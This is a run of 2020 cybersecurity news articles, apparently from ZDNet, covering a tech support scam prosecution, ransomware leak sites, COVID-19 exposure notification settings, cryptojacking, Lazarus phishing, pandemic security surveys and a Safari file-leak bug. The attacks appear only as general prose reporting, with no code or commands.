Information Technology

Image: ZDNet

US authorities have charged three suspects involved in a large-scale tech support scam operation after FBI agents arrested one of their co-conspirators and turned him into an informant.
Evidence provided by the informant along with court documents filed in the case provide an in-depth glimpse at the techniques and inner workings of a modern-day tech support scam, from its earliest stages to the methods crooks use to launder funds obtained from defrauded victims.
Of the three suspects named in the case, one has been arrested earlier this year, and he pleaded guilty earlier this week.
It all started with an informant
However, while charges were filed in January this year, the investigation into this group began in May 2019, when the FBI arrested an Indian national on fraud-related charges.
According to court documents obtained by ZDNet today, the suspect (hereinafter “the informant”) agreed to cooperate with investigators and become an informant for the FBI, seeking leniency from US authorities in his case.
The informant admitted to FBI agents that he was an active member of a tech support scheme and gave up the names of three of his collaborators, all three Indian nationals.
Two of the suspects owned call centers in India, while a third lived inside the US, where he acted as a money mule by receiving funds from victims into his US bank accounts, and then transferring the money to the call center operators.
Publishers, brokers, and call centers
The informant said that his role in the scheme was as a “broker,” and he sold “call traffic.” According to the informant, brokers are the second category/stage in an online tech support scam scheme.
The first category is what the informant described as “publishers.” These are criminal groups that create the actual tech support websites that show misleading error messages and popups urging users to call a toll-free number.
Publishers then ran online ads on platforms like Facebook, for various topics, such as travel and more, but redirected users who clicked on the ads toward their malicious sites.
Brokers, such as the role which the informant played, operated as intermediaries between the publishers and the call centers. Brokers managed telephony servers through which they sold “call traffic” to a call center operator willing to buy it, based on their respective capacity, or to other brokers, who had active clients (call centers) with free capacity.
The informant, which agreed to provide the FBI with access to his device and have calls recorded, said that most of these negotiations took place via WhatsApp and other online chat applications.
Call center owners would get in touch with brokers, agree to a price per batch of calls, and provide a number to which the broker would re-route incoming calls from tech support scam victims.

WhatsApp chat showing the informant selling “call traffic” from tech support scam site publishers to an Indian call center.
The scheme in which the informant was involved used tech support pages that posed as Microsoft security alerts.
The alerts told visitors they’d been infected with malware and that they had to call a phone number for further assistance from a Microsoft employee.
Victims listed in the indictment were all elderly citizens who lacked technical skills to determine that the security alert was fake.
Call center operators would often gain access to bank accounts
Past IM chat logs and phone calls recorded by the FBI also allowed agents to learn how the scheme continued once victims connected to the call center.
Per court documents, call center employees would operate by convincing callers they needed to download and install a version of the SupRemo remote control software on their computers.
This software would allow call center operators to connect to the victim’s computer and resolve the supposed “technical issue.”
At the end of this operation, victims would be asked to pay for the technical assistance they received, usually through a bank transfer or through gift cards acquired from local stores.
According to a recorded phone call the informant had with one call center owner, call center operators would often ask victims to connect to their bank accounts while the operator would still have access to their systems, allowing the operator to collect bank account credentials.

Conversation between the informant and a call center owner, with the call center owner admitting they had access to victims’ bank accounts.
Similar experiences were also reported by past victims, which the FBI contacted during their investigations.

Sample case cited by the FBI in court documents where the call center operator had direct access to the victim’s bank account.
Money received as payments, or surreptitiously stolen from victims’ bank accounts, would usually be transferred to intermediary bank accounts controlled by money mules.
Informant also served as money mule
At the FBI’s request, the informant also agreed to serve as a money mule, and operated one of these intermediary bank accounts, which the FBI then used to track payments and the entities involved in these scams.
Court documents list only a few of the victims who lost money as part of these scams, with estimated losses around tens of thousands of US dollars. However, the true losses from this operation are believed to be in the millions of US dollars, as the scheme appears to have been going on since at least 2017, and most likely involved many more other victims beyond the ones cited in court files.
US authorities filed formal charges in January 2020 against three suspects the informant identified.
The call center operators are still at large in India, but one money mule was arrested in February this year while trying to board a flight from New York to India.
Named Abrar Anjum, the money mule pleaded guilty on Monday, according to a DOJ press release and court documents. He’s scheduled to be sentenced in October, and faces a maximum prison sentence of up to 20 years. More

Image: ZDNet

It has now become a mainstream tactic for big ransomware groups to create so-called “leak sites” where they upload and leak sensitive documents from companies who refuse to pay the ransomware decryption fee.
These “leak sites” are part of a new trend forming on the cybercriminal underground where ransomware groups are adopting a new tactic called “double extortion.”
The perfect example of how ransomware gangs are currently using “leak sites” and “double extortion” to put pressure on victims to pay is the case of the University of Utah.
Last week, the university’s management admitted to paying $457,000 to a ransomware gang even if they recovered their encrypted files using previous backups.
In a statement posted on its website, the university justified its payment by revealing that the ransomware gang threatened to leak files containing sensitive student data online if the university did not agree to pay regardless if they recovered their original files.
Dozens of ransomware groups operate leak sites
Such incidents are becoming more common these days as more and more ransomware groups shift to operating a leak site to put additional pressure on victims.
The good news is that not all ransomware gangs operate leak sites.
However, this number has been steadily growing since December 2019, when the operators of the Maze ransomware launched the first-ever leak site.
Today, the list of ransomware gangs who operate leak sites includes the likes of Ako, Avaddon, CLOP, Darkside, DoppelPaymer, Maze, Mespinoza (Pysa), Nefilim, NetWalker, RagnarLocker, REvil (Sodinokibi), and Sekhmet.
Some of these groups are small-time operators that even malware analysts have barely heard of, but some, like Maze, DoppelPaymer, REvil, and NetWalker, are some of today’s largest ransomware threat actors, responsible for a large chunk of ransomware attacks.
Other groups, like BitPaymer, WastedLocker, LockBit, ProLock, and the Dharma family, have not yet adopted leak sites. The reasons are unknown, but malware researchers have told this ZDNet reporter in previous conversations that some criminal groups like to operate without drawing too much attention to themselves — and leak sites tend to draw way too much attention from journalists, cyber-security firms, and law enforcement officials alike.
Conti launches leak site
But last week, we had another major ransomware group shift to this double-extortion tactic and launch a leak site.
Know as Conti, this is a relatively new ransomware strain. However, reports from Arete, Bleeping Computer, and Carbon Black claim that Conti “is being operated by the same group that conducted Ryuk ransomware attacks in the past” — with Ryuk being one of the most active ransomware operations from the past two years and one of the biggest players on the ransomware scene.
Discovered by a malware analyst going by the pseudonym of BreachKey, the Conti leak site is available at different URLs on both the public internet and the dark web.
BreachKey says the site already lists 26 companies that have fallen victim to the group’s attacks and have declined to pay the ransom, and that for each company listed on the site, the Conti group has leaked documents obtained from their networks.

Image: ZDNet
All in all, the launch of yet another leak site shows that the double-extortion scheme is here to stay with ransomware gangs.
This new trend also means changes need to take place in how companies treat ransomware attacks. While in the past, victim companies only had to recover files and get back to day-to-day operations, today, ransomware attacks almost always involve the theft of sensitive corporate data, employee or customer personal details.
This, in turn, means that most ransomware incidents also require an in-depth incident response and broad network audits to discover lingering backdoors that could be used for future attacks, but also public disclosure and data breach notifications, which are necessary when any type of personal user/employee data has been stolen. More

Some people, people who spend a great deal of time glued to their smartphones (devices that have active cellular connections and a built-in GPS receiver) are inexplicably worried that Apple and Google have installed a tracking app onto their phone on the form of a COVID-19 tracker.
What you’re actually seeing is the groundwork that Apple and Google have done to allow governments and health agencies to develop their own COVID-19 trackers, and also to give the end-user the ability to turn the feature off if they want to. It’s not an app (technically it’s the API framework), and only approved apps can make use of the feature.
And the end-user is in control of it. From installing the app, to removing it and erasing the data.
Both companies issued a statement outlining their plans back in May.
Must read: This app will tell you if your iPhone has been hacked

Apple rolled out the feature as part of its iOS 13.5 update for the iPhone. You can find it by going Settings > Privacy > Health under COVID-19 Exposure Logging. There it explains that an authorized app is required to turn the feature on.

COVID-19 Exposure Logging

×
img-5406.jpg

For Android, Google rolled this out as part of an update to the Google app pushed via the Google Play Store, as opposed to users having to wait — potentially forever — for an Android update.
For Android, go Settings > Google and click on COVID-19 exposure notifications, where you’ll get all the details.

COVID-19 exposure notifications

×
screenshot-20200620135348.png

Bottom line, no one has installed anything, and no one is tracking you using this feature. Maybe you’re being tracked in one of a myriad of other ways, but this isn’t one of them. More

Image: Symantec

Browser-based cryptocurrency mining, also known as cryptojacking, made a surprising comeback earlier this year, in the month of June.
In its Threat Landscape Trends report for Q2 2020, US cyber-security vendor Symantec said cryptojacking saw a 163% increase in detections, compared to the previous quarters.
The spike in activity is extremely uncharacteristic for this particular threat, considered by all security experts to be long dead.
A short history of browser-based cryptojacking
The glory days of browser-based cryptocurrency mining (cryptojacking) lasted from September 2017 to March 2019, during which time, browser-based cryptojacking become one of the most prevalent forms of cyber-attacks.
The rise of this particular malware trend coincided with the launch and shutdown of Coinhive, a German-based web service that allowed users to mine the Monero cryptocurrency inside their own website just by adding a small JavaScript library (coinhive.js) to their sites’ source code.
While the service launched as an alternative website monetization scheme to classic online ads, the service became very popular with cybercrime groups.
Cybercriminals would often hack into websites across the world and secretly load Coinhive’s library on the sites, but configured to mine Monero for the criminal groups.
However, in March 2019, out of the blue, the Coinhive operators announced they were shutting down, citing various reasons, including the growing difficulty and efficiency in mining Monero inside web browsers.
Furthermore, by that time, browser makers also had enough of malicious groups slowing down websites and started deploying security features to detect and block cryptojacking operations.
In addition, academic teams also began looking into the scheme’s efficiency. For example, an academic paper published in August 2019 discovered that cryptojacking was incredibly inefficient at generating revenue, despite its popularity among cybercrime groups, with just three classic online ads generating 5.5 times more revenue than a web-based cryptojacking script.
These were the reasons why after Coinhive’s shutdown in the spring of 2019, detections for cryptojacking attacks have gone off a cliff and flatlined to almost non-existent levels, as most cybercrime gangs moved on to other tactics.
Router-hijacking botnet suspected
Prior to today’s report, Symantec said cryptojacking detections have been at the same low detection levels for months.
While the company could not be reached for comment on the source of the June spike, a source in the antivirus industry told ZDNet today that the sudden surge in cryptojacking detections was most likely caused by a router botnet.
The source, who did not want to be identified by name for this report, said that such incidents have happened before, and usually in Latin America.
Malware groups often hack into home routers and change DNS settings to hijack legitimate web traffic, use the hacked routers as proxies, or abuse them to launch DDoS attacks.
In some rare instances, some groups will also experiment with other ways of monetizing their router botnets, such as deploying cryptojacking scripts, usually modified versions of the old coinhive.js library, updated to work without the now-defunct Coinhive service.
However, despite the sudden spike in browser-based cryptojacking detections in June, a full comeback is not expected. Most cybercrime groups who experimented with cryptojacking operations in the past usually dropped it weeks later, as they also discovered that browser-based cryptocurrency-mining was both a waste of their time and too noisy, drawing more attention to their respective operations than profits. More

Microsoft is edging closer to general availability of its Application Guard security technology for Microsoft 365 apps, which gives IT admins and security staff a little more assurance that users opening risky attachments won’t cause a malware outbreak. 
Application Guard offers additional protections for enterprises using Word, Excel, and PowerPoint for Microsoft 365 and Windows 10 Enterprise. 

Microsoft argues that Application Guard for Office or Microsoft Defender Application Guard for Office “helps prevent untrusted files from accessing trusted resources, keeping your enterprise safe from new and emerging attacks”.
Microsoft released the private preview of Application Guard for Office in February, extending a feature that had until then only been available for the new Edge browser. 
The feature allows users to open websites safely with the protection of hardware-level containerization. The feature isolates browser processes from the underling operation system and the device.
“To help protect your users, Office opens files from potentially unsafe locations in Application Guard, a secure container that is isolated from the device through hardware-based virtualization,” Microsoft said in a blogpost about the public preview. 
“When Office opens files in Application Guard, users can securely read, edit, print, and save those files without having to reopen files outside the container.”
The feature will be off by default and it is only available to customers with Microsoft 365 E5 or Microsoft 365 E5 Security licenses.
PCs need to be on Windows 10 Enterprise edition, build version 2004, 20H1, 19041, and have the Office Beta Channel Build version 2008 16.0.13212 or later, according to Microsoft’s technical documents. 
Microsoft Defender Advance Threat Protection (ATP) works with Application Guard for Office for monitoring and providing alerts about malware in the isolated environment.   
Microsoft notes a few restrictions that the technology creates. For example, it prevents an untrusted document from accessing trusted resources. Admins may need to turn off the feature if a user wants to access files across boundaries. Also, macros and ActiveX controls are disabled in Application Guard for Office.

Windows 10 More

The Lazarus group is on the hunt for cryptocurrency once more and has now launched a targeted attack against a crypto organization by exploiting the human element of the corporate chain.

On Tuesday, cybersecurity researchers from F-Secure said the cryptocurrency organization is one of the latest victims in a global campaign which has targeted businesses in at least 14 countries including the UK and US. 
Lazarus is an advanced persistent threat (APT) group thought to be tied to North Korea. Economic sanctions against the country imposed due to nuclear programs, human rights abuses, and more may have something to do with the group, which focuses on financially-motivated attacks that have expanded to include cryptocurrency in the past three years. 
The US government says Lazarus was formed in 2007 and since then, researchers have attributed the group as responsible for the global WannaCry attack wave, the $80 million Bangladeshi bank heist, and the 2018 HaoBao Bitcoin-stealing campaign. 
See also: US charges two Chinese nationals for laundering cryptocurrency for North Korean hackers According to F-Secure, the latest Lazarus attack was tracked through a LinkedIn job advert. The human target, a system administrator, received a phishing document in their personal LinkedIn account that related to a blockchain technology company seeking a new sysadmin with the employee’s skill set.   
The phishing email is similar to Lazarus samples already made available on VirusTotal, including the same names, authors, and word count elements. 
As is the case with many phishing documents, you need to entice a victim to enable macros that hide malicious code for them to be effective. In this case, the Microsoft Word document claimed to be protected under the EU’s General Data Protection Regulation (GDPR), and so, the document’s content could only be shown if macros were enabled. 
Once permission is granted, the document’s macro created a .LNK file designed to execute a file called mshta.exe and call out a bit.ly link connected to a VBScript. 
This script conducts system checks and sends operational information to a command-and-control (C2) server. The C2 provides a PowerShell script able to fetch Lazarus malware payloads. 
CNET: Weather Channel’s location data settlement doesn’t mean much for your privacy
The infection chain changes depending on system configuration and a range of tools are used by the threat actors. These include two backdoor implants similar to those already documented by Kaspersky (.PDF) and ESET. 
Lazarus is also using a custom portable executable (PE) loader, loaded into the lsass.exe process as a ‘security’ package that modifies registry keys using the schtasks Windows utility. Other malware variants used by Lazarus are able to execute arbitrary commands, decompress data in memory, as well as download and execute additional files. These samples, including a file called LSSVC.dll, were also used to connect backdoor implants to other target hosts. 
TechRepublic: CISOs should put ad fraud security on their radars
A tailored version of Mimikatz is used to harvest credentials from an infected machine, especially those with financial value — such as cryptocurrency wallets or online bank accounts. 
F-Secure says that Lazarus has attempted to avoid detection by wiping evidence, including deleting security events and logs. However, it was still possible to snag a few samples of the APT’s current toolkit to investigate the group’s current activities. 
“It is F-Secure’s assessment that the group will continue to target organizations within the cryptocurrency vertical while it remains such a profitable pursuit, but may also expand to target supply chain elements of the vertical to increase returns and longevity of the campaign,” the researchers say.  
Previous and related coverage
Have a tip? Get in touch securely via WhatsApp | Signal at +447713 025 499, or over at Keybase: charlie0 More

Caught by the sudden onslaught of COVID-19, most businesses lack or have inadequate security systems in place to support remote work and now have to deal with a new reality that includes a much wider attack surface and less secured user devices. Many also have had to adapt and adopt digital tools quickly, taking on new technology that may not be adequately secured.
Already, 21% of organisations in Singapore revealed they had seen an increase in attacks on their IT systems due to the pandemic, according to a HackerOne report released this week. Some 58% of these businesses believed they were more likely to encounter a data breach as a result of the global pandemic, found the survey, which polled 200 respondents in the city-state. Conducted by Opinion Matters in July 2020, the HackerOne study polled 1,400 security professionals in Singapore, Australia, France, Germany, Canada, the UK, and the US. 
Across the board, 64% felt it was likely their organisation would experience a data breach as a result of the pandemic. HackerOne CEO Marten Mickos said: “The COVID-19 crisis has shifted life online. As companies rush to meet remote work requirements and customer demands for digital services, attack surfaces have dramatically expanded, leaving security teams stretched thin and not staffed to cope.”

With more employees working from home, it has become easier to launch attacks at enterprises, warned Eugene Kaspersky, CEO of Kaspersky, who was speaking at Kaspersky’s Asia-Pacific Online Policy Forum last week. 
The security vendor saw a 25% increase in the number of new malicious apps to more than 400,000 a day, from 300,000 before the virus outbreak. Kaspersky said this was the reality today and why having the right cybersecurity strategy was even more important now amidst the pandemic. 
Fellow panelist David Koh, Cyber Security Agency of Singapore’s (CSA) commissioner of cybersecurity and chief executive, concurred, noting that governments, industries, and individuals have had to change the way they live, work, and play, and all in a very short span of time. 
Companies had to adapt to work from home arrangements and engage partners and customers online, Koh said. “Things that some thought were too difficult to do nine months ago have had to change overnight,” he said. “We had to fundamentally adapt and employ new technology literally overnight [and] a lot of this new technology is much less secured.”
Databases, for example, had to be extended so employees could access them from their home environment and controls that were in place previously within physical workplaces were no longer relevant. 
Instead, employees’ home Wi-Fi systems now were the main connectivity hubs and these were not as secured as the office environment, Koh said. An organisation’s risk profile had changed and it had to deal with a larger attack surface, he added.
Employees had been taken out of offices and into homes, but organisations did not have security systems set up outside their enterprise walls, said Mark Johnston, Google Cloud’s Asia-Pacific head of security for networking and collaboration specialists. 
Speaking to ZDNet in a video call, he noted that businesses now had to deal with devices outside of their network they never had to to manage before. Traditional virtual private network (VPN) tools might not necessarily work well as these could not scale well, Johnston said, adding that his team saw a sudden influx of customer queries on how to securely handle access from devices outside of their infrastructure.
Cybercriminals also had adapted, widening their focus to tap public interest in COVID-19 as lures for scams, phishing, and ransomware attacks.
New vulnerabilities also were exposed because users had moved outside of their enterprise environment and were no longer protected by a firewall, Johnston said, noting that Google’s machine learning platform dynamically adjusted to the spike in COVID-19 themed attacks. 
He said the system clocked 3 billion COVID-related email communications in a week, of which 240 million were spam and 20 million were malware attacks. Some 99.9% were blocked before they could hit inboxes.
Rajesh Pant, India’s National Cyber Security Coordinator, also noted a spike in online usage across his country due to the pandemic. The National Informatics Centre, which manages India’s e-government services and supports the public sector’s ICT needs, previously handled 20 million e-mail queries a day. This now has climbed to 70 million a day, according to Pant, who was speaking at the Kaspersky forum. Correspondingly, there has been a 600% increase in cybercrime. 
To help its population safeguard their cyber space, he said the Indian government issued advisories, for example, to guide employees on working from home and running videoconferences securely, such as creating waiting rooms for Zoom. 
There also had been increased focus on credentials and identity, since more were accessing the corporate network from different home and online environments, he noted. “The entire system has become distributed,” he said, stressing the need for a new cybersecurity architecture. 
Noting that the often-cited critical areas of “people”, “process”, and “technology”, still held true in cybersecurity, Pant underscored the importance of educating users on safeguarding their own cyber hygiene. 
Mihoko Matsubara, NTT’s chief cybersecurity strategist, said: “We’re now more vulnerable because so many companies have shifted abruptly to work-from-home and remote work arrangements.” She noted that 45% of organisations in Asia-Pacific had yet to provide training to guide employees on how to work securely when doing so remotely.
Budgets also were likely to have been cut due to the uncertain economic climate, which further compounded the problem, Matsubara said. 

According to a Barracuda Networks study, 40% of companies worldwide had their cybersecurity budget cut as a cost saving measure due to COVID-19. Some 51% said their workforce lacked proper training on the cyber risks associated with remote working and 51% had seen an increase in email phishing attacks since moving to a remote working model. 
“We’ve had to adapt to the COVID-19 situation abruptly…[and] from a technology perspective, many of us were not ready,” Koh said. He noted that cybersecurity required a balance of the iron triangle comprising usability, security, and cost. 
HackerOne’s Mickos noted that the outbreak also compelled organisations to realise they were slow with their digital transformation and cloud migration. Some 37% in Singapore said the pandemic pushed them to accelerate their digital transformation efforts, with early 40% admitting they were forced to do so without being fully prepared. 
“The strain this puts on security teams is immense,” he said. “Cost-cutting measures combined with an increase in attacks means data breaches present a significant threat to brand reputations that may have already taken a hit.”
Need for common rule of cyber laws
Koh pointed to “a strong need” to develop rules-based international order for cyberspace, similar to what the world already had for the physical domains of land, sea, air, and global trade. 
In this aspect, he said Singapore believed the United Nations played an important role in facilitating dialogues and facilitating international cooperation. He noted that there already were ongoing efforts to establish an Asean cybersecurity framework. 
Kaspersky noted that while he supported the need for a global federation, previous attempts to do so — including at the 2011 London Cyberspace Conference — had not resulted in anything substantial. 
He expressed hope that the COVID-19 pandemic would encourage more nations to recognise the importance of such efforts and finally establish a working system for a safer cyberspace. This would be critical to help identify and stop cybercriminals across jurisdictions, he said.
Matsubara welcomed the regulations within each region, but noted that the diversity between countries and even within smaller regions such as Asean, where there were different languages and cultures, would make it difficult to impose regulation across the board. And it would take years to establish such regulations. 
So while it was important to have regulation to incentivise companies to implement good cybersecurity practices, she stressed the need to also educate governments, businesses, and individuals to ensure robust cybersecurity was embedded in every organisation. 
“We use IT more during this pandemic, so cybersecurity need to be everywhere and for everybody,” she said, urging the need for a change in mindset.
Johnston also called for more standardisation on regulations governing the use of data. He noted that there currently were different levels of maturity in regulatory and privacy laws and even between industries with regards to their use of ICT and how security was applied. 

And while the European Union had a common data security framework in the General Data Privacy Regulation (GDPR), Asia-Pacific still lacked a similar legal directive. This created challenges for multinational corporations looking to expand into this region, compelling them to ensure they complied with different bars of privacy and security of legislations across the different markets, such as Singapore’s Personal Data Protection Act (PDPA) and the Reserve Bank of India’s laws on payment data, he said. 
Security needs to be ‘by default’, simpler
Koh also advocated the need to simplify technology, which currently was too complex and difficult to manage. “We’re asking everyone including SMBs to be responsible for their own cybersecurity. This is impossible,” he said. “It needs to be made simple so everyone on the street can take care of their own cyber hygiene. It needs to be security by default, not just security by design.”
Regulations, for instance, would help ensure telcos were doing the right things upstream, so consumers were delivered “a cleaner internet pipe”, he noted. Pointing to how water systems were commonly operated today, he said: “Now, [in cybersecurity] everyone’s left to purify their own water…isn’t it easier to have a central organisation purify it first [before it’s delivered through water pipes]? It should be the same with cybersecurity.”
To facilitate such efforts, Koh said Singapore earlier this year introduced a labelling scheme to help increase consumer awareness about security when using Internet of Things (IoT) devices, specifically, home routers and smart home hubs. The initiative also aimed to push manufacturers to deploy enhanced cybersecurity measures and create a mandate for a set of minimum security requirements for home routers. 
Noting that price, functionality, or colour typically were deciding factors when consumers purchased a tech product, he said few would consider the level of security in the device. The labelling scheme would help address this with its simple three-tick system, he added, where devices with three ticks were assessed to have good security features. 
Tech vendors such as Google and Kaspersky are hoping to take the complexity out of security by tapping automation and artificial intelligence (AI). 
Similar to its aim to democratise AI, Google hoped to do the same with security, Johnston said. The goal here was to focus design efforts on ease-of-use like it did with its consumer products to more advanced business security tools, he said. 
Kaspersky also noted that AI and machine learning were essential in security to help those who were unable to help themselves. 
Such tools would monitor enterprise environments to ensure users, as well as applications, were doing what they were expected to do and identify any abnormalities within the systems, he said. 
RELATED COVERAGE More

Image: REDTEAM.PL

A security researcher has published details today about a Safari browser bug that could be abused to leak or steal files from users’ devices.
The bug was discovered by Pawel Wylecial, co-founder of Polish security firm REDTEAM.PL.
Wylecial initially reported the bug to Apple earlier this spring, in April, but the researcher decided to go public with his findings today after the OS maker delayed patching the bug for almost a year, to the spring of 2021.
How does the bug work
In a blog post today, Wylecial said the bug resides in Safari’s implementation of the Web Share API — a new web standard that introduced a cross-browser API for sharing text, links, files, and other content.
The security researcher says that Safari (on both iOS and macOS) supports sharing files that are stored on the user’s local hard drive (via the file:// URI scheme).
This is a big privacy issue as this could lead to situations where malicious web pages might invite users to share an article via email with their friends, but end up secretly siphoning or leaking a file from their device.
See the video below for a demonstration of the bug, or play with these two demo pages that can exfiltrate a Safari user’s /etc/passwd or browser history database files.
[embedded content]
Wylecial described the bug as “not very serious” as user interaction and complex social engineering is needed to trick users into leaking local files; however, he also admitted that it was also quite easy for attackers “to make the shared file invisible to the user.”
Recent criticism of Apple’s patch handling
However, the real issue here is not just the bug itself and how easy or complex it is to exploit it, but how Apple handled the bug report.
Not only did Apple fail to have a patch ready in time after more than four months, but the company also tried to delay the researcher from publishing his findings until next spring, almost a full year since the original bug report, and way past the standard 90-days vulnerability disclosure deadline that’s broadly accepted in the infosec industry.
Situations like the one Wylecial had to face are becoming increasingly common among iOS and macOS bug hunters these days.
Apple — despite announcing a dedicated bug bounty program — is increasingly being accused of delaying bugs on purpose and trying to silence security researchers.
For example, when Wylecial disclosed his bug earlier today, other researchers reported similar situations where Apple delayed patching security bugs they reported for more than a year.

For two of my bugs they’ve told me same thing that it will be fixed on “Fall of 2020” and yesterday I ask for the update. They replied it’s not a bug 😅
— Nikhil Mittal (@c0d3G33k) August 24, 2020

When in July, Apple announced the rules of the Security Research Device program, Google’s vaunted Project Zero security team declined to participate, claiming that the program rules were specifically written to limit public disclosure and muzzle security researchers about their findings.
Three months before, in April, another security researcher also reported a similar experience with Apple’s bug bounty program, which he described as “a joke,” describing the program’s goal as trying “to keep researchers quiet about bugs for as long as possible.”

The industry standard for disclosure of security issues is 90 days. We’re well beyond that point now. Why should I not publish?
— Jeff Johnson (@lapcatsoftware) April 21, 2020

An Apple spokesperson acknowledged our request for comment earlier today but said the company wouldn’t be able to comment, as it needed to investigate further. More